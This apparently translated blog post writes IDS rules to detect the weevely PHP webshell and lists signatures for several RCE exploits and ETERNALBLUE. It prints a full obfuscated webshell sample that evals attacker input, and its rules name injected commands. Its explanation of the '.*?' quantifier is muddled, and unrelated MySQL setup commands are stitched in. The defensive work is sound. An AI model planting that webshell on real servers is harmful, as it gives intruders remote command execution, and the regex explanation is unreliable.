Below we write detection and blocking rules for the webshell generated by weevely 4.0.1. Packet capture shows that connecting to the webshell itself produces no traffic at the network layer; only after the connection succeeds and a command is executed do TCP and HTTP requests and responses appear at the network and application layers. So we can only match and block the malicious commands executed after a successful connection.

We match the webshell with a generic regular expression. First, let's look at the webshell file.

Format of the PHP webshell generated by weevely

<?php
$s='@x(@base6Vr4_decode($m[1])Vr,$k)))VrVr;$o=@ob_geVrtVr_conteVrnts();@Vrob_end_cleVraVr';
$B='$k="e10aVrdc39";Vr$kh="4Vr9baVr59abVrbe56"Vr;$kf="eVr057f20f883VrVre";$Vrp="ZwNqIe';
$K='ents("VrpVrhp://inpVrut"),Vr$m)==1) {@oVrb_staVrrt();@eVrval(@gVrzuVrncompreVrsVrsVr(';
$Y='}^Vr$Vrk{$j};}}retVrurn $o;}Vrif (@prVreg_VrmVratch("Vr/$Vrkh(.+)$Vrkf/",@fiVrle_get_cont';
$A='orVr($i=0Vr;$VriVr<$l;){forVr($j=0;($j<$cVr&&$Vri<$l);$j+VrVr+,$i++){$o.=$t{$Vri';
$V='n();$r=@basVre64Vr_encode(@xVr(@gzcomVrVrpress($oVr),$k));prVrint("$Vrp$kh$rVr$kf");}';
$i='lcBgDVrHKsyVrm";functioVrVrn xVr($t,$k){$c=strlVren($Vrk);$l=stVrrlen($Vrt);$o=Vr""Vr;f';
$p=str_replace('XU','','crXUeXUateXUXU_funXUXUction');
$T=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>

Let's interpret it. Across several webshells of this kind we can see some common features, for example:

<?php
$(letter)





$(letter)=str_replace();
$(字母)=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>

These lines appear in practically every webshell weevely generates, so we build the regex around them.

First, look at this:

\x3c\x3fphp[\s\n]\x24\w\x3d

The many \xab-style tokens are characters written as their hexadecimal ASCII code (the ab part). So the first part obviously matches <?php, followed by [\s\n].

Here \s matches whitespace and \n matches a newline; in other words, the whole first line is matched and the newline starts the match on the second line.

Then \x24 is the $ sign, and \w is quite handy: it matches any word character (a letter, digit or underscore), so it matches the variable name. Finally \x3d matches the equals sign, so the regex above matches up to:

<?php
$s=

The last three lines are matched as follows:

$(letter)=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>
\x24\w\x3dstr_replace\x28\x27.{1,20}\x27\x2c\x27\x27\x2c(\x24\w\x2e)+\x24\w.*?
\x24\w\x3d\x24\w\x28\x27\x27\x2c\x24\w\x29\x3b\x24\w\x28\x29\x3b.*?\x3f\x3e

Clearly \x27 matches a single quote and \x2c matches a comma.

The . after \x27 matches any character except a newline, and {1,20} repeats it 1 to 20 times.

The only debatable part after that is .*?. Here it matches multiple characters, greedy matching, so it would match a whole line of spaces right up to the last newline! The ?, however, stands for convergence: the spaces just matched are matched zero or one time, so they are matched only once and are not replayed! The expression below means the same thing, so this somewhat resembles backtracking, except that it does not go back and search again the way backtracking does. Here is a brief introduction to backtracking.

alert http any any -> any any (msg:"PHP weevely webshell"; http.request_body; content:"<?php"; pcre:"/\x24\w\x3dstr_replace\x28\x27.{1,20}\x27\x2c\x27\x27\x2c(\x24\w\x2e)+\x24\w.*?\x24\w\x3d\x24\w\x28\x27\x27\x2c\x24\w\x29\x3b\x24\w\x28\x29\x3b.*?\x3f\x3e/s"; classtype:weevely-webshell; sid:3; rev:1;)
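As an added check that is not part of the original post, the rule's regex run in Python over a constructed sample built from the skeleton above and over a benign PHP file; the pattern is compiled with DOTALL, since the lazy .*? has to cross line breaks, and its tail follows the $T);$b(); form of the sample shell.

```python
import re

# The regex from the rule on this page, compiled with DOTALL so the lazy ".*?"
# can cross the line breaks between "$T=str_replace(...);", "$b=$p('',$T);$b();"
# and "?>"; its tail follows the ");$b();" form of the sample shell.
WEEVELY_RE = re.compile(
    rb"\x24\w\x3dstr_replace\x28\x27.{1,20}\x27\x2c\x27\x27\x2c"
    rb"(\x24\w\x2e)+\x24\w.*?"
    rb"\x24\w\x3d\x24\w\x28\x27\x27\x2c\x24\w\x29\x3b\x24\w\x28\x29\x3b"
    rb".*?\x3f\x3e",
    re.DOTALL,
)

# Constructed sample following the skeleton shown on this page; the encoded
# payload strings are shortened, the assembling lines keep their shape.
WEEVELY_SAMPLE = (
    b"<?php\n"
    b"$s='@x(@base6Vr4_decode($m[1])Vr,$k)))VrVr;';\n"
    b"$B='$k=\"e10aVrdc39\";Vr$kh=\"4Vr9baVr59abVrbe56\"Vr;';\n"
    b"$p=str_replace('XU','','crXUeXUateXUXU_funXUXUction');\n"
    b"$T=str_replace('Vr','',$B.$s);\n"
    b"$b=$p('',$T);$b();\n"
    b"?>\n"
)

# Constructed benign PHP that also calls str_replace() on a one-letter variable.
BENIGN_PHP = (
    b"<?php\n"
    b"$a=str_replace('-','','2024-06-23');\n"
    b"$d=new DateTime($a);\n"
    b"echo $d->format('Y');\n"
    b"?>\n"
)


def weevely_match(body: bytes):
    """Return the matched bytes or None. Because every ".*?" is lazy, the
    match ends at the first "?>" after "$b();", not at the last "?>" in body."""
    m = WEEVELY_RE.search(body)
    return m.group(0) if m else None


def is_weevely(body: bytes) -> bool:
    """True when the request body contains the weevely skeleton."""
    return weevely_match(body) is not None


if __name__ == "__main__":
    for name, body in (("sample", WEEVELY_SAMPLE), ("benign", BENIGN_PHP)):
        print(name, is_weevely(body))
```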

Groups and users are hierarchical: when configuring MySQL we first add the group, then add the user.

groupadd mysql
useradd -g mysql mysql

Then give the user ownership of the installation:

chown -R mysql.mysql /usr/local/mysql-8.0

When we start the machine again and it has no IP address, we can request one again:

sudo dhclient ens33

We install and start the HTTP service:

yum install httpd php php-common

Next, the consolidated weevely rules:

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M1"; flow:to_server,established; http.header; content:"QHBhc3N0aHJ1KC";sid:2013938; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M2"; flow:to_server,established; http.header; content:"BwYXNzdGhydSgn";classtype:web-application-activity; sid:2025593; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M3"; flow:to_server,established; http.header; content:"AcGFzc3RocnUoJ";sid:2025594; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (pcntl_exec() function used)"; flow:to_server,established; http.header; content:"JGFyZ3MgPSBh";classtype:web-application-activity; sid:2013943; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (python_eval() function used)"; flow:to_server,established; http.header; content:"QHB5dGhvbl9l";classtype:web-application-activity; sid:2013942; rev:6;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - Downloaded"; flow:established,to_client; file_data; content:"<?php|0A|$"; content:"="; distance:4; within:2; content:" str_replace("; distance:0; classtype:trojan-activity; sid:2020555; rev:2;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (shell_exec() function used)"; flow:to_server,established; http.header; content:"aGVsbF9l";classtype:web-application-activity; sid:2013939; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (proc_open() function used)"; flow:to_server,established; http.header; content:"JHAgPSBhcnJheShhcnJh";classtype:web-application-activity; sid:2013940; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (popen() function used)"; flow:to_server,established; http.header; content:"JGggPSBwb3Bl";classtype:web-application-activity; sid:2013941; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (perl->system() function used)"; flow:to_server,established; http.header; content:"JHBlcmwgPSBuZXcg";classtype:web-application-activity; sid:2013944; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (exec() function used)"; flow:to_server,established; http.header; content:"ZXhlYygn";classtype:web-application-activity; sid:2013945; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (system() function used)"; flow:to_server,established; http.header; content:"QHN5c3Rl";classtype:web-application-activity; sid:2013937; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MorXploit Shell Command"; flow:established,to_server; http.uri; content:"?cmd=ZXhpdA=="; fast_pattern; http.user_agent; content:"Mozilla 5"; startswith;classtype:bad-unknown; sid:2019951; rev:3;)

alert http any any -> any any (msg:"ET WEB_SERVER ATTACKER WebShell - 1337w0rm - cPanel Cracker"; flow:established,to_server; http.request_body; content:"user=CRACKER"; classtype:trojan-activity; sid:2020097; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER PHP System Command in HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"<?"; content:"system|28|"; distance:0; classtype:web-application-attack; sid:2020102; rev:5;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER WPScan User Agent"; flow:established,to_server; threshold: type limit, count 1, seconds 60, track by_src; http.user_agent; content:"WPScan v"; depth:8; classtype:web-application-attack; sid:2020338; rev:4;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - POSTed"; flow:established,to_server; http.request_body; content:"<?php|0A|$"; content:"="; distance:4; within:2; content:" str_replace("; distance:0; classtype:trojan-activity; sid:2020556; rev:3;)

alert http any any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - Cookie"; flow:established,to_server; http.header; content:"ing|3a| identity|0D 0A|Host|3a|"; http.cookie; content:"SESS="; content:"|3B| SID="; distance:0; content:"|3B| PREF="; distance:0; content:"|3B|SSID="; distance:0; classtype:trojan-activity; sid:2020557; rev:3;)

Trying the new weevely rules:

alert http any any -> any any (msg:"MALWARE BACKDOOR Weevely PHP backdoor detected"; flow:established,to_server; content:"POST"; http_method; content:"Accept-Encoding|3a| identity"; http_header; content:"Content-Length: 83"; flowbits:set, Weevely_post_request; noalert; classtype:web-application-attack; sid:2000001;rev:1; metadata:created_at 2022_06_23, by sampson;)

alert http any any -> any any (msg:"MALWARE BACKDOOR Weevely PHP backdoor detected"; flow:established,to_client; content:"200"; http_stat_code; content:"|3d 3d|"; http_server_body; nocase;flowbits: isset, Weevely_post_request; classtype:web-application-attack;sid:2000002; rev:1; metadata:created_at 2022_06_23, by sampson;)

alert http any any -> any any (msg:"结尾是0,有嫌疑"; flow:established,to_client; content:"200"; http_stat_code; content:"|0d 0a 30|"; http_server_body; nocase; flowbits:isset,Weevely_post_request; classtype:web-application-attack; sid:2000003; rev:1; metadata:created_at 2022_06_23, by sampson;)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Authenticated QuickBox CE 2.5.5/Pro 2.1.8 RCE Attempt Inbound M1 (CVE-2020-13448)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/index.php?id=88&servicestart="; fast_pattern; content:"|3b|sudo"; distance:0; reference:url,www.exploit-db.com/exploits/48536; reference:url,s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/; reference:cve,2020-13448; classtype:attempted-admin; sid:2030237; rev:1; metadata:attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Authenticated QuickBox CE 2.5.5/Pro 2.1.8 RCE Attempt Inbound M2 (CVE-2020-13448)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/index.php?id=88&servicestart="; fast_pattern; content:"|3b|wget"; distance:0; reference:url,www.exploit-db.com/exploits/48536; reference:url,s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/; reference:cve,2020-13448; classtype:attempted-admin; sid:2030238; rev:1; metadata:attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible WordPress Plugin BBPress 2.5 - Unauthenticated Priv Esc Attempt (CVE-2020-13693)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user_login"; content:"user_pass"; distance:0; content:"|22|bbp_keymaster|22|"; distance:0; fast_pattern; reference:url,www.exploit-db.com/exploits/48534; reference:cve,2020-13693; classtype:attempted-admin; sid:2030239; rev:1; metadata:affected_product Wordpress_Plugins, attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_server; http.method; content:"PUT"; http.cookie; content:"vcloud_jwt="; startswith; http.request_body; content:"|3a|Host|3e 24 7b|"; content:".getDeclaredConstructors|28 29 5b|"; distance:0; fast_pattern; flowbits:set,ET.20203956; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030240; rev:1; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,from_server; http.stat_code; content:"400"; http.response_body; content:"<Error"; content:"has|20|invalid|20|length|20|for"; fast_pattern; flowbits:isset,ET.20203956; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030241; rev:1; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)

MS17_010

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible Successful ETERNALROMANCE MS17-010 - Windows Executable Observed"; flow:to_server,established; flowbits:isset,ETPRO.ETERNALROMANCE; content:"|FF|SMB|26 00 00 00 00|"; offset:4; depth:9; content:"|4d 5a|"; distance:0; content:"This program cannot be run"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:2024207; rev:3; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2022_03_17;)


alert tcp any any -> any 445 (msg:"ET EXPLOIT ETERNALBLUE Exploit M2 MS17-010"; flow:established,to_server; content:"|8000a80000000000000000000000000000000000ffff000000000000ffff0000000000000000000000000000000000000000000000f1dfff000000000000000020f0dfff00f1dfffffffffff600004100000000080efdfff|"; reference:cve,CVE-2017-0143; classtype:attempted-admin; sid:2024297; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_05_16, deployment Perimeter, former_category CURRENT_EVENTS, performance_impact Low, signature_severity Major, updated_at 2017_07_06;)


alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE Exploit M3 MS17-010"; flow:to_server,established; content:"|ff|SMB|32 00 00 00 00 18 07 c0|"; offset:4; depth:12; content:"|00 00 00 00 00 00 00 00 00 00 00 08 ff fe 00 08|"; distance:2; within:16; fast_pattern; content:"|0f 0c 00 00 10 01 00 00 00 00 00 00 00 f2 00 00 00 00 00 0c 00 42 00 00 10 4e 00 01 00 0e 00 0d 10 00|"; distance:2; within:34; isdataat:1000,relative; threshold: type both, track by_src, count 10, seconds 1; classtype:trojan-activity; sid:2024430; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_06_27, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2017_07_06;)

MS08_067

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ECLIPSEDWING MS08-067"; flow:to_server,established; content:"|ff|SMB|2f 00 00 00 00|"; offset:4; depth:9; content:"|00 00 00 00 ff ff ff ff 08 00|"; distance:30; within:10; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; fast_pattern; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; isdataat:800,relative; classtype:trojan-activity; sid:2024215; rev:1; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2017_04_17;)